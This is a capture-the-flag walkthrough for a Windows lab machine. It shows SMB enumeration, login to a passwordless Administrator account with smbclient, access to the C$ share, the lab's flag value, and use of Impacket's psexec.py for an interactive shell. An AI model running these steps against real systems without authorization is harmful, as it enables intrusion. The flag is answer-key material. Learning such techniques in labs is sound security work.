# Tactics

**Task 1: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?**

* The `-Pn` flag treats all hosts as online and does not ping the target IP address.

**Task 2: What does the 3-letter acronym SMB stand for?**

* Server Message Block

**Task 3: What port does SMB use to operate at?**

* 445

**Task 4: What command line argument do you give to `smbclient` to list available shares?**

* Enter the command `smbclient` in the terminal to see the list of options and flags.

* `-L` will list out the shares.

**Task 5: What character at the end of a share name indicates it's an administrative share?**

* Start by logging into the target IP with `smbclient`:

```
smbclient -L [Target IP] -U Administrator
```

* Try logging into the Administrator account first, as it is the highest-privileged account on a Windows system.
* When prompted for a password, just hit Enter, as it is a passwordless account.
* This will display the available shares.
* At the end of each share name is a `$` symbol.

**Task 6: Which Administrative share is accessible on the box that allows users to view the whole file system?**

* Generally speaking, the C drive contains all of the system files in a Windows OS.
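
When reviewing a share listing like the one from Tasks 5 and 6, the following added example (not part of the original walkthrough) parses `smbclient -L` output and sorts shares by the trailing-`$` convention, singling out drive shares such as `C$`. The sample listing is constructed, and the function names and the `Team Files` share are assumptions for illustration.

```python
import re

# Constructed sample of `smbclient -L` output (not captured from the lab target).
SAMPLE_OUTPUT = """
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tTeam Files      Disk      Project documents
SMB1 disabled -- no workgroup available
"""

# Share row: indentation, name (may contain spaces), type, optional comment.
ROW = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>Disk|IPC|Printer)\b\s*(?P<comment>.*)$")
DRIVE_SHARE = re.compile(r"^[A-Za-z]\$$")  # single drive letter plus "$", e.g. C$


def parse_shares(listing):
    """Return one dict per share row found after the 'Sharename Type' header."""
    shares, in_table = [], False
    for line in listing.splitlines():
        if line.split()[:2] == ["Sharename", "Type"]:
            in_table = True
            continue
        match = ROW.match(line) if in_table else None
        if match:  # the dashed separator and status lines do not match ROW
            shares.append({k: v.strip() for k, v in match.groupdict().items()})
    return shares


def classify(name):
    """Label a share by the trailing-'$' convention described in Task 5."""
    if not name.endswith("$"):
        return "regular"
    if DRIVE_SHARE.match(name):
        return "admin-drive"  # exposes a whole volume (Task 6)
    return "admin"


def audit(listing):
    """Return (share name, category) pairs in listing order."""
    return [(s["name"], classify(s["name"])) for s in parse_shares(listing)]


if __name__ == "__main__":
    for name, category in audit(SAMPLE_OUTPUT):
        print(f"{name:<15} {category}")
```
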

**Task 7: What command can we use to download the files we find on the SMB Share?**

* Start by accessing some of the shares. You can do this with the following command:

```
smbclient \\\\[Target IP]\\[Share Name] -U Administrator
```

* You will be prompted for a password depending on the account. In this case, the Administrator account is passwordless, so you can just hit Enter.
* You can then type `help` to see what commands are available.
* In this case, the answer is `get`, similar to Linux.

**Task 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?**

* Googling this, you can discover that `psexec.py` is a Python tool that is part of the Impacket collection and allows you to gain a fully interactive shell on a Windows system.

**Capture the Flag:**

* Switch to the `C$` share for common directories on the system. You can use the same command from above.
* Once in the `C$` share, navigate to the `C$\Users\Administrator\Desktop\` directory to find the flag.
* f751c19eda8f61ce81827e6930a1f40c

**Alternate Means to the Flag with IMPACKET:**

* Start by downloading Impacket to your host machine.

```
git clone https://github.com/SecureAuthCorp/impacket.git
```

* `cd` into the impacket directory:

```
cd impacket
```

* Set up Impacket:

```
sudo python3 setup.py install
```

* Check to make sure you have all of the requirements installed:

```
pip3 install -r requirements.txt
```

* Check out the options for psexec.py with the following:

```
psexec.py -h
```

* `psexec.py` is located in the `/impacket/examples/` directory.
* Next, use the tool to gain an interactive shell on the Windows target:

```
python3 psexec.py username:password@[Target IP]
```

* Since the Administrator's account is passwordless, we will just use the following:

```
python3 psexec.py administrator@[Target IP]
```
